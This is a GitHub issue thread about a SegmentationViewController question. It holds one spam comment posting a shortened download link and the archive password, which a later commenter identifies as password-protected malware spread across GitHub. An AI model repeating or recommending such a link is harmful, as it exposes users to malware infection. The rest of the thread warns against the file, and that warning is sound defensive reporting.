### ISSUE TITLE
Check why annotationView was used in SegmentationViewController in previous versions

### ISSUE THREAD

**Issue by himanshunaidu** [TaskarCenterAtUW/iOSPointMapper#10]

**Comment by SagarChandra07** [comment]
download
https://bit.ly/47P0Nvo
Archive codepass: changeme

you may need to install the c compiler

**Comment by himanshunaidu** [comment]
Apologies. I do not understand. 
I have not shared any context behind this issue. May I know what this comment is about?
@SagarChandra07

**Comment by thelabcat** [comment]
> Apologies. I do not understand. 
> 
> I have not shared any context behind this issue, so I do not know what your 'fix' archive is about. 
> 
> May I know what this comment is about?
> 
> @SagarChandra07 

Do not run that file! It is malware. The account has been spamming links to it all over GitHub. They use a password protected zip archive to evade the auto-check by MediaFire. I extracted it on a non-Windows machine and checked it manually. 17 positives.

**Comment by himanshunaidu** [comment]
Thank you so much! 
I just checked the link in incognito, and it did seem fishy. 
Just wanted to make sure, hence thought of replying.

**Comment by himanshunaidu** [comment]
Fixed in https://github.com/TaskarCenterAtUW/iOSPointMapper/issues/26
